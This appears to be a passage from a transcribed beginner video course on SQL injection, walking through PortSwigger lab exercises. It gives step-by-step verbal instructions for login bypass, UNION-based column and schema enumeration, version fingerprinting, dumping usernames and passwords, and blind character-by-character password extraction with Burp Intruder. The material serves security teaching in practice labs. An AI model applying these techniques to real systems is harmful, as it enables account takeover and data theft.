together. It's making this query all together. And what we're doing is essentially commenting out everything after our username, so the password doesn't even matter. So when I say we comment something out, we're commenting out everything after our statement. And so we throw this hash in here, and everything after it's commented out. The password doesn't matter. I think we can get by with no password because I don't have it set up right now that you have to have any characters in here, and it will come back as true. And this is what I'm talking about when we say SQL statement and we're querying a database or a server. Okay, there is one other thing I really want to show us. We're going to go over this again, exactly what I'm showing you right now in another couple of videos, but I think it'll be helpful to see it. So one other thing is, whenever you give it the database a true statement, it's going to come back without an error or saying it's a logged in. It's going to come back as true. So we just saw the statement that looked like this. We had our username, and then we had or 1 equals 1, and 1 equals 1 is always true, and so it comes back as logged in or it comes back as true. There are other things we can do to get information from a database. Let's say we had credit card numbers on this table. We had a credit card table, and you wanted to pull down the credit card numbers. Now obviously none of you are going to do that because you are not about to break the law or do anything illegal. Everything we're doing is for security purposes, to help businesses, right? Nothing bad. We would never pull down credit card numbers. Let's pull down a table of flowers or something. What we'll do is, let's see, we want these username and passwords, and we have an ID. So we have 3 columns here that have information in them. Let's say we know the table is users, and we want to know how many columns we have. What we'll do is to pull down something true. If we want to pull down the number of columns because we don't actually know how many there are, and we want to just find out some information from this database, you can actually come in here just like we did before, put in our random username that doesn't really matter. And then this is what I mean when I say a union select statement. So we're going to connect union to our statement here. So we have select all from users where username equals these things. And then we're going to add to it. We want to add a union select, if I can spell, we're going to select null. And this will tell us, is there one column in our table? And we send this, we're going to crash the server. I'll go ahead and send it so you can see we crash the server. I have to come over here, restart the server, and then I'm just going to give you, there's 3 columns. We know there are 3 columns. So we'll throw in null 2 more times, and this will say union select null, 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 which is going to pull down how many columns there are. And if we send this, we got crash the server because we didn't comment out the rest of the string that we were querying. So here we go. We'll log in. Now we have no undefined came back, which means we have no errors. So we'd know there are 3 columns. And so this is going to come up in one of our very first SQL injections that we're going to be doing on the Portswigger web application. And there are labs that they have set up for us to practice on. And you feel free to continue practicing in there. But this is something we're going to be doing, and we're going to be going in a lot more detail. And you'll have to pay attention to this comment because it will change between 2 dashes without the semicolon based on the type of database that we're using. So I do apologize if this seems confusing. Hopefully it becomes more clear as we continue on. We're going to be covering SQL injection for quite a little while. We're going to be going through it in a pretty good amount of depth. And I know this is a beginner course, but this is a really common vulnerability. It's in the top 10 most common vulnerabilities. I think it's in the top 5 most common vulnerabilities. And like I said, there are bug bounty hunters out there that dedicate their time strictly to SQL injection, so it's worth learning. And I don't think it's too difficult. It's looking a little difficult right now because you've never seen it before. But by the end of this module in the course, if it's still unclear, you can go back and try it again and go back through this module, and it will become more clear, and you will memorize how to find these vulnerabilities. So with that, I will see you in the next video.
Okay, we are here on portswigger.net. You can go ahead, I actually went ahead and logged in and created a new account. You can come in here and you can come up here, click sign in, and then create a new account. And then once you've done that, come back to the website and you will go to Academy. You can go ahead and click that and it'll load up, and then you'll go to all labs. And then this will take us to some of the labs we're going to be working through and the SQL injection. There's a whole bunch of them. We're not going to be going through all of them because some of them get kind of repetitive. And it has been a while since I have done these, at least a year. And so I actually thought what would be good, I'm not going to rehash any of these before we go through them. So you are going to see me make mistakes and you'll get to see my thought process, and you'll kind of just get to see how I work through these. And so if you want, you can go ahead and open up the first one. And then I like to open it up in a second tab over here. And they'll give you some instructions and kind of tell you what you're looking for here. And they'll actually tell you where to find some of the SQL injections so you don't have to spend your time clicking through the whole web application and trying to figure out where things are. And so they kind of point you in the right direction. And so we're looking for a SQL injection with the union attack. And so what this looks like, let's open this back up, is when you find, so this is what their side of the query looks like. and then we would be typing in, you would close it off. In our case, it's going to be a single quote, union select, and then we're going to be looking for the number of columns and what we can find within this vulnerability. So we come over here and it says find the number of columns returned by the query. And there's a couple of ways to do this. I'll show you both. I think they both work in this program, and you can decide what works best for you. So you can come in here, and I actually want to first give you a chance. I'll show you kind of what we're looking for, and then I'll send you, I might have passed it, on your way, and see if you can find it on your own. So you can come in here, send one of these to your repeater, and see if you can find the SQL injection without any help. And it's okay if you haven't. We really haven't covered this a whole lot, but in the coming videos, we'll be able to do this multiple times over and over. And so you'll get the hang of what we're going through and what we're looking for. Okay, I'm going to send this to the repeater. I'm not actually sure where the SQL injection is even at. I think we'll try right here. Okay, that's what we're looking for. It is going to be right here. And so we're looking for this right here. This is what I was talking about in the last video, the internal server error. If you can produce this error, what you should immediately be thinking is there's going to be a SQL injection here somewhere. It is here somewhere. You just have to figure out how to exploit it. And so what the challenge actually tells us to do is we're looking for the number of columns returned. And so we're trying to figure out how many columns are on the specific table. And so if you think of an Excel spreadsheet, you have rows and then you have columns. And what we're trying to do is figure out how many columns exist on the table. And when you're doing a SQL injection, we're going to be looking for passwords as we go through the Portswigger program, but there are a lot of other things you can look for, and we're going to get to those and exactly how to find them. Even though you're never really going to pull down actual information on a bug bounty program, I wanted to walk through, as someone who doesn't know how to program in SQL, what to do if you come across a capture the flag and you're trying to find specific things such as usernames or flags or passwords. And so we'll get to that in the coming videos, but now we have produced this internal server error. And so we know we are looking for the number of columns using the union attack. So we have our single quote, which breaks the query, and then we type in union. And because we are sending this request, we have to send a plus for the space. If you don't have the plus in there and you actually put a space in, it will break what we're trying to send. So union select, and then you put in here null, which is just nothing, and then you send it, and it comes back with nothing, and then you just hit comma, and then you would put in null, and you'd send it, and it still sends us an error. So we put in null again and we send it. And oh, what we forgot to do was you have to close out the rest of the query. So in here we have to put a dash dash, so that comments out everything after our statement here. So whoops, we are actually able to comment out everything after. So we'd send this, and then we'd come over here and we'd put in null again. And it still says we haven't found the number of columns. And so it hit on the number 3, it came back, okay, so this statement would be true. So when the statement is true, it'll send us back a response. And so we have our response, which means there are 1, 2, 3 columns inside this lab we're working on. And so with that, I will see you in the next video, because as soon as we go ahead and send this, it should say we have solved this lab. And so as we come into the next one, we'll read the instructions and we'll work through it. But I want you to go ahead and open up this second lab and see if you can pull down the number of columns in it, and then we'll pull down which columns contain text. So I'll see you in the next video. Okay, what I would like for you to do is go ahead and open up the second lab and click access to the lab. And I want you to go in here and do exactly what we did last time and see if you can remember how to find the number of columns in a SQL table. So you can go ahead, you can open that up, see if you can find it, and then if you want to try and figure out how to find the columns containing text, you can Google around and see if you can figure it out. If not, we're going to work through it now, and you will have the opportunity to practice finding columns containing text, as well as continuing to find the number of columns in a table in the future. So this isn't your only chance to try and practice this on your own. In fact, I would encourage you, as soon as we finish SQL injection, to go back through some of these labs and see if you can solve them by yourself. And then maybe once the course is over, come back and try them again, just to ingrain this process into your mind, because this is going to be something I highly recommend you look for when you start your bug bounty or web application pen testing career. And so go ahead and give that a try now, and then we'll go ahead and work through it together. Okay, if you were able to pull down the number of columns, then you have figured out or learned what we went through in the last lesson. But if not, we're going to go ahead and work through this one again. So we'll come in here, we'll just click on one of these tabs, and we'll have a request sent, a get request, and then we will take it and go ahead and send it to repeater and see if we can find an internal server error. Might not actually be in this one. Let's see. There it is. It's in this one. So we'll send this to repeater and put in our single quote. And there is the error. So this is where our injection is going to be. And so if you weren't able to find it, you can go ahead and from here and see if you can solve the challenge and pull down the number of columns in this lab. So you can go ahead and give that a try now. Okay, what we do here, if you remember, is we type in union and our plus, then we select, and then we have our plus, and then we type in our first null value for the column, and then we comment everything else out after the request is sent. And it says we still have an error, and so we try this in. You actually don't have to have these in all caps. It's just kind of common practice for what people usually do, is have things in all caps. I'm not really even sure why. So if you know why, if you're a programmer and you know why, you can go ahead and let me know. I actually do programming, and I actually build websites and web applications and tools for pen testing, but I still don't know. And so if you know, you can go ahead and let me know why some things are in caps when they don't have to be. So we pulled this down, and we found 1, 2, 3 columns. And so if you made it this far, good job. Congratulations. You have learned how to pull down the number of columns, but now we're supposed to pull down which column has text or which ones take text. And so you would put in your single quotes and then you put in a string and then send it. And that one came back as an error, so we'll try the next column. And it is the second column contains text, and we'll go ahead and try the final column as well. Whoops. Okay, so it would be the center column is the one we would go after to try and pull down information, which is not actually available in this lab, but it is going to be available in the coming labs. So in the next lab, I want you to try and go through this, find the category of where you're going to find your error, and then try and pull down union, select the number of columns, which column contains text, and then we'll work through how to actually pull down the information from that column. All right, I did not notice after I had closed the video that the lab still said it was unsolved. And for those of you that is bothered when a lab goes unsolved or you want to see them all solved, I'm going to go ahead and do that now because I know if I were you, that would bother me saying that someone had completed the task, yet it didn't complete the task. What happened was the lab wants us to input something that we receive back in the response. So we'll go ahead and I'll show you where to find that. If you want, you can go ahead and try and find it. I actually think this is a good challenge. I think you'll be able to find it. Just go ahead and go into the lab and go ahead and perform the SQL injection. Find the one that contains the accepts a string, and then look through the response and read through it and see if you can find the answer to solve the challenge. If not, we're going to go ahead and do that now. So we come in here and we perform the union select SQL injection the way we always do. And this is my problem. Okay, what you have to do in order to solve the challenge is when you look through here, it says make the database retrieve the string. And so we copy this and we inject it as our string. And I actually think, yeah, it goes in the center one. This here solves the challenge for you. And so now the challenge is solved, and I will see you in the next lesson. Okay, we are back with the third SQL injection challenge. You can go ahead and click on it and read through the prompt. I'm actually going to give you the challenge to see if you can pull down which column or columns contain characters and will accept a string. And then I'm going to walk you through pulling down data from the table. And then I would suggest practicing. So after we go through it on this lab, to try and go through it again without the video before you move on to the next lesson so that you can continue practicing things as you see it happening. So we'll go ahead and enter into the lab, and it's going to be pretty much the same. So if you want to go ahead now, I'm going to wait a few seconds and you can pause the video and see if you can complete the challenge and pull down which column or columns contain a string before we go ahead and continue learning how to enumerate the table columns. So by now this should be pretty familiar to you. We're going to come in here, we're going to look for our request that I apparently passed. We'll send this to repeater. We'll make sure that we get our internal server error, and then we'll try our union select attack. And send it and see how many columns we pull down. So there's only 2 in this lab. And so what we'll do now is we're going to pull down information from the table. So I'm going to show you how to do that, then I'm going to give an explanation of the best way, if you don't know any SQL or you don't know how to write any SQL statements, how to find table names if you find this in a capture the flag and you don't want to go through the long process of trying to figure out the table names through writing SQL statements. But before we get there, I'm going to show you, this is what we'll do. We have 2 columns. You'll see, check to see if they'll accept a string, and that one does. I'm going to go ahead and leave it, and that one does as well. That means there's both these columns have information within them. And let's say there was a third column. When we wrote, if we were to write our SQL statement, we would have to include all 3 columns because the query has to be considered true. You would just leave the null statement in here. So it would look something like this. You would leave the null, let's say it was at the beginning. Let me actually just delete all this and write the statement out. And we're going to see some of these in the coming videos, and just to give you an idea that you can go ahead and try and do these. You would do null plus the username. See, this is what you have to do. You'd leave this as an empty column, but in our case we don't have 3 columns, so we're going to just go with the ones that we do have and the ones that will accept a string. And so we're going to pull down usernames, and then we're also going to look for the passwords in the table. So we look for the password, and it's from the users. And this should pull down for us the username and the password from the users table. And then we'll look through the response and see, this looks like a user, this looks like a password, this looks like a user, this looks like a password, and this would be the administrator, this would be his password. So in our response, we have pulled down the usernames and the passwords that are within the table. And this would give us access, if we wanted to, you could log in as these people. If this was a real website, you would have access to their accounts. And this is why SQL statements are very dangerous, and this is why in the bug bounty world you actually get a pretty good payment from finding SQL injections. And not only can you pull down usernames, but there are other databases that you can find, such as usernames, names on credit cards, or credit card numbers, which makes them very dangerous. Since we have pulled down the usernames and passwords, you can go ahead and turn your proxy off so that the web page loads, and then you will have the usernames here and the passwords, and you can come over to log in and you can give them a try and see if you're able to log in and see if this solves the challenge. That one didn't solve it. Let's go ahead and try let's try the administrator. There, that one solved the challenge for us. So with that, I want you to go ahead and see if you can figure out the next challenge without any help. See how far you can get and if you can make it through. So I'll see you in the next video. Okay, we are back again. We are going to skip over this fourth lesson and we're going to jump into the fifth lesson. And you can go ahead and open this up and read through it. This time we're going to be in an Oracle database, and so we're going to be trying to pull down the version that it is running. And so with this tip, we can see there's a built-in table called dual. So they actually give us the table name this time for us to run through. And I think with what you've learned so far in the SQL injection cheat sheet, you should be able to figure out how to solve this challenge. So if you want to go ahead and pause the video now and try, you can go ahead and do that. If not, we're going to walk through the solution together. So we'll open up the page. We'll go ahead and turn our proxy on. And this should all be familiar to you by now. So we're sending that to repeater. We make sure that we get our internal server error, and then we move on just like we have before. So we type in union, select, and then we'll check for a single column. But if you remember, the table name we were told is called dual. And so we can send that, and we still have an error, so let's try for a second column. And we see that there are two tables, or two columns, and the table name of dual. So we'll come in here and make sure they can receive a string, and they can. Looking through the response we got, and so what we'll do now is we're looking for, if you remember, the version name. We're trying to pull down the version name inside the response. So we'll come back to burp, and since these can receive string, we type in here banner, and then if you remember from the previous lesson, if we have multiple columns that can receive a string and we're not actually going to use one, we have to leave it with null, so that way that column receives an input. We just don't want anything from it yet at this point. And then for Oracle, the way you pull down a version is $, and then just the word version. And we'll see if that sends it for us. I saw this change in the background to solved. So that gets us our information that we need. And so we should be able to scroll through here and we find it right in here. All right, I will see you in the next lesson. Okay, in this lesson we're going to go ahead and open up this one, the MySQL and Microsoft. I will just go ahead and tell you they are trying to pull a quick one on us, um, because instead of using the typical dash dash right here that we use in Microsoft to close out or to cancel or to comment out everything after your query, you will use a hashtag, and that will stump me. I will come across that and I can sometimes not figure out what's going on, and I can spend a significant amount of time trying to figure it out. And in the end, I was using the wrong comment. And so that's one thing to be aware of. And in this lab, we're going to inject an attack, and we're going to pull down the type and version of MySQL that's being used. And so this is very, very similar to the last one. And when you go ahead and open up the lab, we are looking to make the database retrieve the string. So I'm actually not entirely sure how to get this to say solved. So we're gonna be figuring this out together for, um, I guess, the first time. So I'm guessing what we're supposed to do is use our union select attack, pull down the um, response that we get right here, and try and find the version, which will look something like this, that it's using, and then go back and put it into a string, and it should give us the solved problem solved up here. So if you would like to go ahead and give this a try on your own, you can go ahead and do that, and I'll give you a few seconds and you can pause the video and then we'll walk through it together. Okay, we're going to continue the same way we have been. Turn on the proxy, pick a category, send it to repeater, turn the proxy off. I'm going to lower this so when it comes through as solved we can see it. We'll see if we get our error, and we do. And so we'll come in and we'll try our union select, and then we go try it for null. And then don't forget the way we comment out is with the hash or the pound symbol. It has more than one column, and it has two columns. So what we will do is we will make sure they can both receive a string, and they do. And so the way we pull down the version in Microsoft MySQL is a little different than the way we did it with the Oracle one. We'll go with the two @ symbols. You type in version, and if you looked through the cheat sheet, you would know this is how you pull down the version for Microsoft. And so what we do is we type in null, because you have to have both columns filled. And then we'll send it. And we came back with a positive response. And so we'll look and see if we can, oh, it solved it for us. It already said solved. I thought we were going to have to find a version number and send it through as a string right here, like this. So if our version number, I forget what it was, something like this. But we didn't actually have to send our version number through in a string to the database. So it gave us the solved just by going like this. And there's our version number. So I thought the way we were going to solve this was send it to the database in a string like that. But it was not the solution. So I will see you in the next video. Okay, at this point, things are going to become progressively more difficult in pulling down usernames and passwords, especially once we get to the blind SQL injection, because this is something that we have not seen before. So we're going to be preparing for that by going into this lab right here. You can go ahead and open it up, and we are going to be pulling down the username and passwords, and we're going to log in as the administrator to solve this challenge. I think you can go ahead if you want and practice pulling down how many columns there are and which ones actually receive a string. And you can go ahead and pause and do that if you would like. If not, we're going to go ahead and solve it together. So we'll turn on the interceptor, and we're going to be seeing some new information that we haven't seen before, and it's going to seem strange, but I'm going to do my best to explain exactly how the SQL statements work, the default tables, and what we're looking for. So we'll go ahead and send that to repeater, turn that off. We'll send that, make sure we get our error, determine how many columns there are, and which ones receive a string. Sorry, can't think and type. So we have 2, and we'll check to see if both of them receive a string, and they do. So at this point, things are going to be a little bit different than what we've been doing. We're actually going to be trying to pull down some information from these tables. And so what we do, the first thing we have to do is figure out the table name. So if we have a grid like an Excel sheet, you have your columns that are going up and down, your rows that are going across, and the name of the table. The first thing we have to know is the table name in order to request the columns and then individual cells within the table for us to pull down that contain the usernames and the passwords. So we have our union select, and then we come in and we type in table name. And so this is what we're looking for. If you remember, we're replacing one of the null values with the table name. Then we leave the second one with the null value because we're not going to be pulling anything from it just yet. And then we go from the information schema. And this right here, the information schema dot tables, and this is a default table that you're going to have on every SQL database. So that's how I know this is there. If you were to go into SQL and you were to open it up, you're going to have several default tables, the information schema tables. This is default, it's always going to be there. And so this is how we know what to put in for our injection. Then we send it, and we have an error, which means I'm guessing I have a typo somewhere in our statement. Let's see. Union select the table name. Right here it is. Information schema. There was my typo. And we pull down and we'll look through our response and pull down the table names that we have here, and there are a bunch of table names. But if you remember, the one we're looking for, we're trying to log in as the administrator, so we're going to need the users table. And so we can just go ahead and see right here, users. This is the name of the users table. I would suggest copying it and having a text file open because we're going to need this information in the very near future. So we have that open there. So now we're going to look for the column name. So we can delete this. So the table column is what we're looking for now. So we're going to, actually, I deleted the wrong part of the request. Instead of the table, we're looking for the column name. And we're going to leave this in the information schema dot columns. And this looks right. And now we're going to add to this because now we're looking for the columns from a very specific table. So now we add a plus and we'll say where the table name equals and then our users table that we just pulled down. So we'll type in table name and then we do equals and then our double quotes. I think I've actually already got that copied still. And then we paste in our users table. So what we have going on is our union select. So everything that's coming before this doesn't really matter. We're adding a query onto it. We're looking for the column name. We have our second value retrieving null because we're not looking for anything from it just yet, from the information schema, which is one of the defaults within the SQL database. And we found the table, so now we're looking for columns where the table name, so we're pulling down the table name, equals users. This is going to give us the columns within the table that is named users with some random characters. And so we should be able to send this. And I'm very happy to report there were no typos. I was a little nervous. You guys were going to have to continue watching me pull through, read through this and try and figure out where my typos are at. So now we should be able to scroll down and we have column names. So the passwords column and the users column. And so now we should be able to change our query and pull down the passwords and the username. So I'm going to go ahead and copy these. We have the username and the password columns. These are the ones that we are interested in. And now we're going to change our union statement. So now instead of pulling down a column name, we are going to be looking for the username and the password. So we can delete our null and we can insert the password column, and here we'll put in the username column in the first slot instead of the column name. And we're looking for the username, the password, and it's coming from our table, from our users table. I don't believe we need those little quotes anymore. We'll send that and see what comes back. We still have an error. So what are we missing? The union select, username, the password. We don't need the where. From, oops, I went too far. From users. Let's see if that works for us, and it does. So we should be able to come through now to solve the challenge. We have the administrator and another user, so we can copy the administrator. We can come back to our lab. Remember, to solve it, we have to log in as the administrator. We can paste in the administrator, and then we can come back to burp and copy our password. And this should solve the challenge for us. Okay, now that was very, I don't want to say complicated, but it was a big jump from where we have been coming and where we've been coming from. And so as we get ready to go into blind SQL injections, it's going to become even more complicated. So you might have to go through this lab several times and make sure that you really understand what's happening. Make sure that everything that's built up to this point is working together. The next lab, I believe, is an Oracle lab. Okay, so you can try and solve this one. It's going to be similar to the one that we just did, only you can use the SQL cheat sheet. We'll go ahead and walk through it again just so we can have one more practice before we get into the blind SQL injections, because these are going to use everything we just learned in this lesson plus quite a bit more. We're going to be looking at new aspects within burp and exactly how to use the intruder tool within the burp program. So I think it's very important at this point, if I can stress it enough, we're going to have quite a bit of practice going into the blind SQL injection, but it's a lot more difficult than what we just went through if you've never done this before. So go through this again if you have to. Make sure you understand what's happening and what's going on, and I'll see you in the next lesson. Okay, what I want you to do in this lesson is I want you to try and solve this lab completely on your own. I'm going to give you 2 clues before you start, but other than that, you have already learned everything necessary for solving this challenge. So we'll go ahead and open up the lab, and if you remember, when we do go through an Oracle database, you have to use from dual when you're trying to pull down the number of columns within the table. And so since we're looking for we're going to have to log in as the administrator. That should give you a clue to at least how many columns are going to be within the table. And so the other clue I wanted to give you is if you go ahead and open up the SQL injection cheat sheet, when you pull this open, you are going to be using from all tables instead of information schema. So in the last lesson, we used information schema as our default. Well, that's not what we're going to be using this time. This time we're going to use all tables. So everything should be the same as it was last time. The only difference is we're going to be using all tables instead of information schema. And so you can go ahead with that information and try and solve this lab. And if you have gotten stuck, we're going to go ahead and walk through this together now. So the first thing is turn your interceptor on. We're going to go through the normal procedures here. We're going to send it to repeater, turn the intercept off, and make sure that we have our error appear, which we do. So this is telling us we have a SQL injection. We are going to pull down the number of columns. I know there's at least 2 because we were told that we have to log in as the administrator, which means there's at least a username and passwords column. So we have at least 2 of those. And then we pull down, we have to add our from dual. And then we'll go ahead and send this, and it comes back. So there are 2 columns. Both of these are going to have to retrieve a string in order for us to pull down a username and password. So I'll go ahead and check it anyway, but I know it's going to come through, and it does. Now this is where we are going to start practicing what we learned in the previous video. So if you remember, the first thing we have to do is find the table name. So we can go ahead and type in our table name. And this is from. Last time we used information schema, but if you remember this time, we're going to use all tables. And we have a typo somewhere. Oh, remember we had two columns. I deleted the null value that we had. And there we go. So this should give us all tables. If you remember last time, there was a bunch of them, but we are looking for the users table. I'm guessing this is the one that we need. User history. We're going to go ahead and pull down the information. Well, this is, we'll grab a couple of them just in case, but I think that's going to be the right one. So we'll keep this one. This is the one we're going to roll with. Now what we'll do is we'll have to come back up here, if you remember, and change. Now that we have the table name, we're going to go ahead and insert this and see if we can find the column name. So we'll change this to column, and we'll leave our null, and it is from. And this time we're going to put in our table into our injection. So we have from all. So we have from all of our tables, and we're looking for, at this point, the columns where it is equal, the table is equal to the column or the table name that we just pulled down. So we have where, and then we'll type in our table name, and then equals our table name. And we'll go ahead, look this over, and then we'll send it. And it came through. Now we have to hope that we have our columns. So we have a password column pulled down, and we have the username. Go ahead and put the username up here. Okay, now we have to change our injection one more time. So this time we'll be getting rid of our null value, and we're going to be putting in first our username, and then we're also looking for the passwords, which will come from our second column, and this is going to come from our table name, which I actually think we delete this. We'll delete that, and we'll delete this. And we have an error, comma, and we have pulled it down. So this should have our usernames and our passwords in it, just like the last one that we walked through. Here's the administrator and the password. And so if you remember, we have to log in to actually receive the solved lab up here. So we'll go ahead, paste that, and we'll copy and paste this and send it, and we have solved the challenge. I would again encourage you to make sure that this is making sense, because we're about to build on what we have learned so far, and it is about to become a little more complicated. We're going to be learning more advanced tools, and so just be prepared. Go get yourself a coffee and come back ready and focused, and I'll see you in the next lesson. Okay, we are back and we are ready to start the blind SQL injection. We are going to go ahead and open up this lab, but while it's loading, I thought I would just tell you this is going to be, the next couple of labs are going to be a little more difficult, and I think that you should practice them just to get this ingrained into your mind, what exactly is happening. Because we're going to be adding quite a few new steps, but they actually let us skip what we have been practicing because in the instructions they give us that we are going to be working with a table called users and two columns, usernames or the username and passwords. So we don't have to go find the table and we don't have to find the columns, but we do have to still log in as the administrator to complete this lab. So you can go ahead and open up this lab. And this is actually the second time that I'm shooting this video because the first time I came in to start this lab exactly how we normally would by opening up one of these tabs, forwarding it, and then sending our request to the repeater, putting in our single quote, just to find out that there was no um, SQL injection there, but we can send this to repeater because what you're looking for is a request with this tracking ID. You need that tracking ID because that's where the SQL injection is going to be. So we'll send this and you can send it a few times. And what I'm looking for is this content length. I want to make sure that it does not change. And sometimes you will send this on some web applications and it will change every time, no matter what you do, the exact same GET request. But for us, in our case, it stays the same, which makes this lab much easier to solve. And when you have this tracking ID, you can also check it as well for the SQL injection. And so you send it and you can see the content length has changed. So it's 4906 and you send it and now it has changed. This tells us there is a possibility of a SQL injection. So what we're looking for is what has actually changed in our response. So I actually have already gone through here. What I like to do when I come across a different response is to copy this and take it to a text editor. I think it's easier to read through and to look at, and I also can search, which we are going to do right here. So when it comes back without any modifications, we have the, let's send this again, we have the welcome back is on the page. When we put in our single quote to try and provoke an error, the welcome back is gone. So you can see we have 0 matches right here. And so with our 0 matches, we want to send a true statement to make sure that we can really add on to this query. So we go or 1 equals 1 and then comment this out. That comes back as true. So we know that we can give some kind of request and see what comes back true, what is actually true and is on the database will come back with this welcome back, which is what we're going to have to pay attention to. And so we'll go ahead, because we've already been told what the table name is and the column names, we can go ahead and start to look for information from this table. So we'll type in our usual union select, and this is where it changes because we're going to now add a character into our query. So we're going union select from, and then we're going to go to our users table where the username, oops, username is equal to, and then remember we were told we need to log in as administrator. So the username we're looking for is administrator. And we are going to go ahead and send this and see if it comes back as true. And it does. And I'm very happy it does, because that means you guys don't have to wait for me while I look for my typo. So we have this, and now what we can do is we can actually add onto it, and we can look for the length of the password. And so you can come in here and you can look to see how long the password is, and you can pull down the length of the password, and you can come in here and you can go plus and plus length, and then we add in the password, and then you would add, is it greater than, and then you can start right here and you can start sending to see, is it greater than 1, is it greater than 2, is it greater than 3, and you can send this to the burp repeater and just continue seeing, is it greater than, and looking through this. What I am going to do is I'm actually going to skip this process for the sake of time, because we're going to have to go into a burp intruder and start looking for the actual password. And so what we're going to do is we're going to send this query over to the intruder and see what we can pull back. So I'm going to go ahead and take this query here, and what we're going to do is we're going to take this and we're going to add into it the characters that we're looking for. And so you would add in that you're looking for the first character and only one character inside the query, and then you're going to start with the character A. Now this, at this point, I'm sure this is the first time you've ever seen anything like this. It looks very strange, and it is going to feel really strange doing things like this. It's new, and it's kind of confusing. So we'll send this not to repeater, to intruder. And so we have this new string that we're sending. So we have our normal union select, and then we have a string from users where the username equals administrator. So we're looking on the table name users under the column username for the administrator's password, and we are looking for the actual password at this point. And this, actually, I just noticed, we're not looking for the length of the password. We're going to be looking for the substring. So we'll come over to intruder, we'll look at our positions because we've already sent this over here. We'll clear where it wants us to start querying, and we are looking for the substring in the password. And so we will go ahead and set this up. What we do at this point is, as we set up our payload, you will add the whatever those symbols are to tell it this is where we want to shoot through, or we're going to use the cluster bomb. So this is where we're going to be going through and sorting to make sure we have the right characters. And then we'll add right here, because if you remember, this selects the first character, and then it's going to go through the first character for all of the characters that we give it. But then we want it to go through the second character as well, and then the third and the fourth and the fifth, until we reach the end and we have the password. And I'm using I don't have the professional version of burp on this system, and so this is actually going to go really slow. And once it starts, I'm going to go ahead and pause the video so you don't have to wait for it to pull down the password, because it will actually take a while without the professional version of burp. And so what we're going to do now is we're going to set up our payloads. And so if you remember, payload 1 is going to go to this position, and payload 2 is going to go to this position. So the first payload, we're going through numbers. So we will find numbers. And we're going to go from 1, and this is when I guess it would have been helpful. I'm just going to go really far. This is when it would have been helpful to see how many characters were in the password, so you would have known how far you needed to go. And then we're going to go by a step of 1. So it's going to go up 1 character once it goes through all 30 characters. And then position 2, we are going to be going through the alphabet. See if it has the alphabets in here for us. I believe it does. Manually add these in, it would be a lot easier to go through these without having to do this, but I will edit this out so you guys don't have to see me add all of this in. Alright, I believe we have all of the characters added in. So now what we can do is we can go ahead and start the attack. And we can say OK. And now it is going to go through and start working through all of those characters. So position 1 and A, is position 2 and A, is position 3 and A. And it's going to go through and check every character for each position until one returns true. And one of the things, not sure this works without having the pro version, we have the welcome back that we can grep on. And we'll actually just wait. We'll check the content length. I'll go ahead and cut the video and wait till we receive back the information from our query. Okay, I have gone ahead and cut the video in the middle of where we were after starting the attack, and you can see that it's been running and we've pulled down some of the characters that we've needed. One of the things that might be helpful, if you copied exactly what I had typed in into the payload or into the query right here, I actually had a error, and I had to go through and change that and fix it. And then that ran for a little while, and then also my computer fell asleep while running this, and it closed out my query, and so I had to restart it. And so this has been running for what feels like forever. And so I'm going to go ahead and we're going to stop it here, and I'm going to show you a little more manual way. And it's also a lot faster because if you can see, it's sending one query each time to the server, and it's very slow, anywhere from 10 to 15 seconds. And it's because we've sent so many. And this is one of the things Burp does in order to get you to buy Burp Professional, so that it'll send them really fast. So they've throttled this down, but I'm going to show you a way that you can kind of get around this and send your queries a lot faster. And before we start that, I kind of wanted to show you our positions just in case it wasn't clear. Remember, in our query, we are selecting from the users, the table users, where the username is just the column, and we're looking for the name of administrator inside the password column. And so we're sending, this is the first character in the query. So this would be position number 1, and then it'll change and it'll go position number 2, and then position number 3. And it will send A all the way through, however many we set those positions, 1, 2, 3, 4, 5, 6, to see if an A comes back as true in any of those cases. And if it comes back true, we'll see something like this. You can see the length has changed and the welcome back is present in the response. And then once it goes to all of position 1 for all of the alphabet, it will go to B, and then it will start over and it'll continue and it'll go through like that. This is a very automated way. We don't have to really do anything. We just set it up and let it run. But if you don't have Burp Professional, this can take a very long
time. And one thing before we go ahead and I show you how to organize this to find the password is that in order to get this welcome back to show up, what you do is you can check in your response and you can have your welcome down here. And if you can see these, it matches. The welcome has come back, which means it's true, and we have a match. For these down here, it is not true, and there is no match. And so we can sort out the true characters that exist and in which position they exist. So there's a G in position 2. There's a G in position 15. We have a K in position 8. And so on. And so we can know this is where there's characters and this is how it's true. But in order to get this welcome up here, you have to go into your options. You will come down, so it'll start you up here. You'll scroll down to grep match. You will clear what's in here and you will add welcome. You'll get a little pop-up. You'll just click OK. And then it will bring you back to your results and it will look like this. And what you do is you just click this and you click it again until we have the arrow facing down, and it will have all of the characters there for you as it runs. Now, the way I like to sort out the password is to have a text file open, which is right here. We have our text file. We'll delete this and we'll delete this and we'll paste this in. So what we have here, we'll also delete these because these are just our query numbers on how many GET requests were sent to the server. And I think the less numbers we have, the easier this will be to understand. So I'm going to go ahead and delete all of those. So this, if you remember, let's open this back up and have our text file. This is the position from payload number 1, and this is the character that has come back in payload number 2. So what you would do is we'll just pretend this is 1, 4, 2, 3, 5, 6, and I hope you're getting the idea of what's going on here. So if not, I'm going to explain it. So this will make a lot more sense so we don't have random numbers really stretched out. 10, 11, 12. So let's say this is what we've brought back and the query is finished, even though we know it's still running and it's going to take 5 more hours for it to finish running. So what we'd do is we'd have our password equals, and you'd come here and you'd go, okay, position number 1 is I, and then we'd look for 2. 2 is O. Position number 3 is a K, and then position number 4 is an I, and position number 5, L, and position 6 is a G, and then you'd go along and you would just continue doing this all the way through. So we go 6, and then we go 7, and then 8 is a C, 9 is N, and by the time you've gone through all of this, this is your password. And so we were told that the username is administrator and the password is what we're pulling down right here. And we'd come over here, we'd go to our lab, and this is where we would come in, we'd click log in, you would use administrator, and then this password that we have just pulled down. So if you want to let your intruder run for ever, because it is really slow, especially once you get past about position, after you get past request number 30 to 35, it really slows down. So I'm going to go ahead and close this out. Click OK. And I'm going to show you a little bit of an easier way, a lot faster way. It's not easier, but faster. So what we'll do is we're going to manually go through and we're going to change this position. And I'll show you how much faster this is, but you have to be a lot more involved. Before you could just let it run, and now you're not going to be able to let this run. So I believe we'll go to sniper. So we only have one position instead of cluster bomb, which is for more than one position. We'll come to our payloads and we're going to have 1, and it's going to be a simple list. And if you remember, we're going to do the same thing as we did before, and we're going to run all these characters in the alphabet. And so I'll go ahead and punch all of these in, and we'll run through these with the sniper attack. And let me check our
